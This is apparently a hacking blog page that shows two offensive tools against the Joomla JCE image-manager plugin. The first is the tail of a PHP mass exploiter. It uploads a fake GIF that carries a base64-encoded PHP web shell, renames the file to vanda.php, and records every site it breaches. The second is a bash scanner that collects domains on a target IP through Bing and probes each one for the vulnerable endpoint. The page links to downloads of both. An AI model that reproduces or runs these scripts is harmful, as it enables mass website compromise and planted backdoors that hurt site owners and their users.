  56.   
  57.     $okunan = file($dosya);  
  58.   
  59.     $toplam = count($okunan);  
  60.   
  61.     foreach ($okunan as $sira => $satir) {  
  62.   
  63.         $hatalisite = 0;  
  64.   
  65.         $satir      = preg_replace("/[\\n\\r]+/""", $satir);  
  66.   
  67.         $url        = parse_url($satir);  
  68.   
  69.         if ($url["scheme"])  
  70.   
  71.             $host = $url["host"];  
  72.   
  73.         else {  
  74.   
  75.             $url  = parse_url("http://" . $satir);  
  76.   
  77.             $host = $url["host"];  
  78.   
  79.         }  
  80.   
  81.   
  82.         $packet = "Mua-Kontrol-Paketi-Panpa";  
  83.   
  84.   
  85.         $fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);  
  86.   
  87.         if ($fp) {  
  88.   
  89.             fwrite($fp, $packet);  
  90.   
  91.             fclose($fp);  
  92.   
  93.         }  
  94.   
  95.         $content = "GIF89a1\n";  
  96.   
  97.         $content .= '<?php eval("?>".base64_decode("PGh0bWw+IENvZGVkIEJ5IE11YSAmIEtlcmVzdGVjaTxicj4NCjw/IA0KLyogQ29kZWQgQnkgTXVhICYgS2VyZXN0ZWNpICovDQplY2hvICc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nOw0KZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7DQppZiggJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIgKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+dXN0YSB1cGxvYWQgYmFzYXJpbGk8L2I+PGJyPjxicj4nOyB9DQp9DQo/PjwvaHRtbD4=")); ?>';  
  98.   
  99.         $data = "-----------------------------41184676334\r\n";  
  100.   
  101.         $data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";  
  102.   
  103.         $data .= "/\r\n";  
  104.   
  105.         $data .= "-----------------------------41184676334\r\n";  
  106.   
  107.         $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";  
  108.   
  109.         $data .= "Content-Type: application/octet-stream\r\n\r\n\r\n";  
  110.   
  111.         $data .= "-----------------------------41184676334\r\n";  
  112.   
  113.         $data .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";  
  114.   
  115.         $data .= "0\r\n";  
  116.   
  117.         $data .= "-----------------------------41184676334\r\n";  
  118.   
  119.         $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"mua.gif\"\r\n";  
  120.   
  121.         $data .= "Content-Type: image/gif\r\n\r\n";  
  122.   
  123.         $data .= "$content\r\n";  
  124.   
  125.         $data .= "-----------------------------41184676334\r\n";  
  126.   
  127.         $data .= "0day\r\n";  
  128.   
  129.         $data .= "-----------------------------41184676334\r\n";  
  130.   
  131.         $data .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";  
  132.   
  133.         $data .= "upload\r\n";  
  134.   
  135.         $data .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n";  
  136.   
  137.         $packet = "POST " . $p . "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1\r\n";  
  138.   
  139.         $packet .= "Host: " . $host . "\r\n";  
  140.   
  141.         $packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";  
  142.   
  143.         $packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";  
  144.   
  145.         $packet .= "Accept-Language: en-us,en;q=0.5\r\n";  
  146.   
  147.         $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";  
  148.   
  149.         $packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";  
  150.   
  151.         $packet .= "Connection: Close\r\n";  
  152.   
  153.         $packet .= "Proxy-Connection: close\r\n";  
  154.   
  155.         $packet .= "Content-Length: " . strlen($data) . "\r\n\r\n\r\n\r\n";  
  156.   
  157.         $packet .= $data;  
  158.   
  159.   
  160.             $fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);  
  161.   
  162.             if ($fp) {  
  163.   
  164.                 fwrite($fp, $packet);  
  165.   
  166.                 fclose($fp);  
  167.   
  168.             }  
  169.   
  170.   
  171.         $packet = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";  
  172.   
  173.         $packet .= "Host: " . $host . "\r\n";  
  174.   
  175.         $packet .= "User-Agent: Mua \r\n";  
  176.   
  177.         $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";  
  178.   
  179.         $packet .= "Accept-Language: en-US,en;q=0.8\r\n";  
  180.   
  181.         $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";  
  182.   
  183.         $packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";  
  184.   
  185.         $packet .= "Accept-Encoding: deflate\n";  
  186.   
  187.         $packet .= "X-Request: JSON\r\n";  
  188.   
  189.         $packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";  
  190.   
  191.         $ren = "json={\"fn\":\"folderRename\",\"args\":[\"/mua.gif\",\"vanda.php\"]}";  
  192.   
  193.         $packet .= "Content-Length: " . strlen($ren) . "\r\n\r\n";  
  194.   
  195.         $packet .= $ren . "\r\n\r\n";  
  196.   
  197.             $fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);  
  198.   
  199.             if ($fp) {  
  200.   
  201.                 fwrite($fp, $packet);  
  202.   
  203.                 fclose($fp);  
  204.   
  205.             }  
  206.   
  207.         $taranmis = $taranmis + 1;  
  208.   
  209.             $kod      = oku("http://" . $host . "/images/stories/vanda.php");  
  210.   
  211.             $pozisyon = strpos($kod, "GIF89a1");  
  212.   
  213.             if ($pozisyon == true) {  
  214.   
  215.                 $kirilmis = $kirilmis + 1;  
  216.   
  217.                 fwrite($kirilanlar, "http://" . $host . "/images/stories/vanda.php\r\n");  
  218.   
  219.             }  
  220.     } //for each  
  221.   
  222.   
  223.     fclose($yaz);  
  224.   
  225.     fclose($kirilanlar);  
Download Bash Script :http://www.mediafire.com/view/2rk5ikxu1k1kon3/jce-scanner-exploiter.sh

Download jce.php : http://www.mediafire.com/view/p8210ab5d0duj9y/jce.php



Friday, August 23, 2013

Server Jce Scanner




D3m00 : http://www.mediafire.com/download/04357l3y8t8cerv/jce-scanner%282%29.mp4

  1. #!/bin/bash  
  2. # Jce Server Scanner  
  3. # Coded By : Red V!per    
  4. # http://redhat-viper.blogspot.com  
  5. # Report Bugs : RedH4t.Viper@yahoo.com  
  6. # D3m00 : http://www.mediafire.com/download/04357l3y8t8cerv/jce-scanner%282%29.mp4  
  7. # Tnx 2   : All Turkish && Persian Hacker  
  8.   
  9. #-------------------- Red V!per Banner ----------------------------------------------------------------------------  
  10.   
  11. Banner()  
  12. {  
  13. clear   
  14. echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0  
  15. echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0  
  16. echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0  
  17. echo -e '\E[34m'" ||                                                      || "; tput sgr0  
  18. echo -e '\E[34m'" ||\E[31m  _____          _  __      ___                       \E[34m|| "; tput sgr0   
  19. echo -e '\E[34m'" ||\E[31m |  __ \        | | \ \    / / |                      \E[34m|| "; tput sgr0  
  20. echo -e '\E[34m'" ||\E[31m | |__) |___  __| |  \ \  / /| |_ __   ___ _ __       \E[34m|| "; tput sgr0  
  21. echo -e '\E[34m'" ||\E[31m |  _  // _ \/ _\ |   \ \/ / | | '_ \ / _ \ '__|      \E[34m|| "; tput sgr0  
  22. echo -e '\E[34m'" ||\E[31m | | \ \  __/ (_| |    \  /  |_| |_) |  __/ |         \E[34m|| "; tput sgr0  
  23. echo -e '\E[34m'" ||\E[31m |_|  \_\___|\__,_|     \/   (_) .__/ \___|_|         \E[34m|| "; tput sgr0  
  24. echo -e '\E[34m'" ||\E[31m                               | |                    \E[34m|| "; tput sgr0  
  25. echo -e '\E[34m'" ||\E[31m                               |_|                    \E[34m|| "; tput sgr0  
  26. echo -e '\E[34m'" ||\E[32m   _                                                  \E[34m|| "; tput sgr0       
  27. echo -e '\E[34m'" ||\E[32m  (_)                                                 \E[34m|| "; tput sgr0    
  28. echo -e '\E[34m'" ||\E[32m   _  ___ ___   ___  ___ __ _ _ __  _ __   ___ _ __   \E[34m|| "; tput sgr0  
  29. echo -e '\E[34m'" ||\E[32m  | |/ __/ _ \ / __|/ __/ _\ | '_ \| '_ \ / _ \ '__|  \E[34m|| "; tput sgr0  
  30. echo -e '\E[34m'" ||\E[32m  | | (_|  __/ \__ \ (_| (_| | | | | | | |  __/ |     \E[34m|| "; tput sgr0  
  31. echo -e '\E[34m'" ||\E[32m  | |\___\___| |___/\___\__,_|_| |_|_| |_|\___|_|     \E[34m|| "; tput sgr0  
  32. echo -e '\E[34m'" ||\E[32m _/ |                                                 \E[34m|| "; tput sgr0  
  33. echo -e '\E[34m'" ||\E[32m|__/                                                  \E[34m|| "; tput sgr0  
  34. echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0  
  35. echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0  
  36. echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0  
  37. sleep 3  
  38. echo  
  39. echo -e "$B /\ (^_^) /\ [public] \n"  
  40. echo -e " -===============================================-\n"  
  41. echo -e "   Server Jce Scanner "  
  42. echo    
  43. echo -e "   BY : Red V!per\n"  
  44. echo -e " -===============================================-"  
  45. echo  
  46. echo  
  47. echo -e " -========== [         INFO         ] ===========-"  
  48. echo  
  49. read -p "[*] Target Ip : " IP  
  50. echo -e "$N"  
  51. }  
  52.   
  53. #-------------------- Variables ----------------------------------------------------------------------------  
  54.   
  55. B="\033[1m"  
  56. N="\033[0m"  
  57. L="\033[5m"  
  58. C="\033[m"  
  59.   
  60. #-------------------- Scanning Jce Targets on Server  -------------------------------------------------------  
  61.   
  62. scan_jce_on_victim()  
  63. {  
  64. page=0    
  65. how_many=1    
  66. single_page=    
  67. last_page_check=  
  68. image_manager="index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"  
  69.   
  70.  while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do    
  71.     
  72. url="http://www.bing.com/search?q=ip%3a$IP+%27index.php?option=com_%27&qs=n&pq=ip%3a$IP+%27index.php?option=com_%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"    
  73.     
  74.  wget -q -O domain_bing.php --user-agent="Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5" "$url"    
  75.     
  76.  last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`    
  77.       
  78.  how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`    
  79.     
  80.  single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `    
  81.     
  82.     
  83.   cat domain_bing.php | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt    
  84.   rm -f domain_bing.php    
  85.   let page=$page+1     
  86.   done    
  87.     
  88. cat alldomain_bing.txt | grep "com_" | tr '[:upper:]' '[:lower:]' | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | cut -d '?' -f 1 | awk '{gsub("/index.php","")}1' | sort | uniq >> domains.txt  
  89.     
  90. for domain in `cat domains.txt`    
  91.    do    
  92.      GET -sd "http://www.$domain/$image_manager" | grep "OK" >> /dev/null;check=$?  
  93.       if [ $check -eq 0 ]  
  94.          then  
  95.      echo -e "$B[+] www.$domain/ \e[1;32m[OK] \e[0m"  
  96.          echo "$domain/" >> jce_server.lst  
  97.        else  
  98.          echo "[-] www.$domain/ [No] "  
  99.       fi      
  100.    done    
  101. rm -rf alldomain_bing.txt   
  102. }  
  103.   
  104. #-------------------- Remove  ------------------------------------------------------------------------  
  105. all_remove()  
  106. {  
  107.  rm -rf alldomain_bing*  
  108.  rm -rf domains_f*  
  109.  rm -rf domains_f*  
  110.  rm -f domain_bing*    
  111.  rm -rf alldomain_bing*  
  112.  rm -rf domains*  
  113.  rm -rf jce_server*  
  114. }  
  115.   
  116. #-------------------- Main Brain :D  ------------------------------------------------------------------------  
  117. main()  
  118. {  
  119. Banner;  
  120. all_remove;  
  121. scan_jce_on_victim;  
  122. }  
  123.   
  124. main;  
Download : http://www.mediafire.com/view/g9955347r9ht6y7/jce-scanner.sh

Tidak ada komentar:

Posting Komentar